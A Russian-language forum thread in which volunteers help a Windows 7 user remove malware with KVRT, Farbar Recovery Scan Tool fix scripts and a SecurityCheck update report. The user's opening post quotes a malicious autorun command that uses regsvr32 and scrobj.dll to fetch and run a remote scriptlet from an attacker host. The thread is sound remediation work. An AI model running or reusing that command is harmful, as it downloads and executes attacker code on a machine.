Решена Помогите избавиться от вирусов

[swizzych]

Недавно начал замечать что в автозагрузке (система windows 7 x64 ultimate) появляется загрузка Windows regsvr 32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll...
Пробовал переустанавливать Windows на ту же версию, однако не помогло, сейчас пытался лечить Dr.Web, никаких сдвигов, через время все возвращается на свои места, Dr.Web выдал 10 угроз, среди них Mysa 1/2/3 + ok, сейчас в реестре удалил автозагрузку regsvr 32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll и вроде Dr.Web молчит, но я чувствую, что компьютер работает ощутимо иначе, также malwarebytes вообще не запускается, сколько бы раз я на него не клацал, результата нет...
Прощу помочь избавить меня от этого недуга, заранее благодарю

 

[akok]

Добрый вечер.
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

После

https://safezone.cc/pravila/

 

[swizzych]

Добрый вечер.
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

После

https://safezone.cc/pravila/

 

[akok]

Буткит удалили. Выглядит неплохо, проблема еще наблюдается?

 

[swizzych]

Буткит удалили. Выглядит неплохо, проблема еще наблюдается?

Да, Malwarebytes до сих пор не открывается, а также opera не хочет ставиться браузером по умолчанию

 

[Sandor]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[swizzych]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[Sandor]

Примите к сведению - после выполнения скрипта все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
  2020-06-21 20:30 - 2020-06-21 20:32 - 000000000 ____D C:\ProgramData\360Quarant
  2020-06-21 20:28 - 2020-06-21 21:57 - 000000000 ____D C:\Program Files (x86)\360
  2020-06-21 17:34 - 2019-03-28 21:29 - 000000000 __SHD C:\$360Section
  FirewallRules: [{36FC30C5-AF73-41F5-87FC-E34DA2A6BBDF}] => (Block) LPort=445
  FirewallRules: [{42622642-D682-43FE-AE57-1C0FD301A6ED}] => (Block) LPort=139
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[swizzych]

Примите к сведению - после выполнения скрипта все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
  2020-06-21 20:30 - 2020-06-21 20:32 - 000000000 ____D C:\ProgramData\360Quarant
  2020-06-21 20:28 - 2020-06-21 21:57 - 000000000 ____D C:\Program Files (x86)\360
  2020-06-21 17:34 - 2019-03-28 21:29 - 000000000 __SHD C:\$360Section
  FirewallRules: [{36FC30C5-AF73-41F5-87FC-E34DA2A6BBDF}] => (Block) LPort=445
  FirewallRules: [{42622642-D682-43FE-AE57-1C0FD301A6ED}] => (Block) LPort=139
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[Sandor]

Malwarebytes до сих пор не открывается

Попробуйте его переустановить. То есть, сначала деинсталлируйте через Панель управления - Удаление программ. Затем пройдитесь спец. утилитой.
Скачайте и установите заново.

 

[swizzych]

Попробуйте его переустановить. То есть, сначала деинсталлируйте через Панель управления - Удаление программ. Затем пройдитесь спец. утилитой.
Скачайте и установите заново.

В остальном, какие то вирусы еще остались?

 

[Sandor]

Нет. Кое-какие уязвимые места, которые мы закроем в конце лечения.

 

[swizzych]

Нет. Кое-какие уязвимые места, которые мы закроем в конце лечения.

Программа запустилась, но не включается защита от вредоносных программ, вот так висит,,,

 

[Sandor]

Программа запустилась

Это уже после переустановки?

деинсталлируйте через Панель управления - Удаление программ. Затем пройдитесь спец. утилитой.
Скачайте и установите заново.

 

[swizzych]

Это уже после переустановки?

Да, я ее уже переустановил

 

[Sandor]

Возможно полноценная защита включается только в платной версии.

 

[swizzych]

Возможно полноценная защита включается только в платной версии.

Возможно, что делать дальше?

 

[Sandor]

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[swizzych]

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[Sandor]

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
NVIDIA GeForce Experience 2.11.4.125 v.2.11.4.125 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
WindowsRar 1.0.0.47 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.